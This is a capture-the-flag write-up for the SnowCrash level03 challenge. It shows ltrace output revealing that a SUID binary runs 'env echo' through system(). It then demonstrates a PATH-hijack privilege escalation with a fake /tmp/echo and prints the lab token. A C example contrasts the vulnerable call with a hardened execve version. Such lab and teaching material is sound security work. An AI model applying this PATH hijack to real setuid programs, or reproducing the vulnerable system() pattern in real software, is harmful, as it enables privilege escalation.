
SnowCrash Mission: Flag03

Objective: Retrieve the Level04 token to advance further in the SnowCrash challenge.

There's a SUID binary (level03) in the home folder. Running the file command on level03 gives "setuid setgid ELF 32-bit LSB executable".

Running ltrace on the binary:

level03@SnowCrash:~$ ltrace ./level03

__libc_start_main(0x80484a4, 1, 0xbffff7b4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                        = 2003
geteuid()                                        = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

level03@SnowCrash:~$

It shows that the binary executes the command /usr/bin/env echo Exploit me.

The echo call is made by name rather than by absolute path, so env looks it up through PATH. This means we can create our own echo and inject its directory into the PATH environment variable.

level03@SnowCrash:~$ echo "/bin/getflag" > /tmp/echo
level03@SnowCrash:~$ PATH=/tmp:$PATH
level03@SnowCrash:~$ ./level03

Check flag.Here is your token : qi0maab88jeaj46qoumi7maus

level03@SnowCrash:~$
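
The flaw next to one possible fix, as an added example (not from the original writeup or the level03 source): run_vulnerable repeats the system() call seen in the ltrace output, run_hardened calls the program by absolute path with a fixed environment and no shell. The function names, the /bin/echo location and the harness with its harmless decoy that exits with code 42 are assumptions made for the demonstration.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern seen in the ltrace output: env resolves "echo" through the
 * caller-controlled PATH, so the first executable named echo runs. */
int run_vulnerable(void) {
    int st = system("/usr/bin/env echo Exploit me");
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened form: no shell, absolute path, fixed argv and environment. */
int run_hardened(void) {
    char *const argv[] = { "echo", "Exploit me", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int st;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve("/bin/echo", argv, envp); _exit(127); }
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Constructed harness: places a harmless decoy "echo" (exits 42) first in
 * PATH, runs fn, restores PATH, cleans up. Returns fn's exit status. */
int status_with_decoy_first(int (*fn)(void)) {
    char dir[] = "./pathdemoXXXXXX", file[64], path[8192];
    char *old = strdup(getenv("PATH") ? getenv("PATH") : "/usr/bin:/bin");
    if (!old || !mkdtemp(dir)) { free(old); return -1; }
    snprintf(file, sizeof file, "%s/echo", dir);
    FILE *f = fopen(file, "w");
    if (f) { fputs("#!/bin/sh\nexit 42\n", f); fclose(f); chmod(file, 0700); }
    snprintf(path, sizeof path, "%s:%s", dir, old);
    setenv("PATH", path, 1);
    int rc = f ? fn() : -1;
    setenv("PATH", old, 1);
    unlink(file); rmdir(dir); free(old);
    return rc;
}

int main(void) {
    printf("vulnerable with decoy first: %d\n", status_with_decoy_first(run_vulnerable));
    printf("hardened with decoy first:   %d\n", status_with_decoy_first(run_hardened));
    return 0;
}
```

A status of 42 means the decoy ran in place of the real echo; 0 means the real /bin/echo ran regardless of PATH.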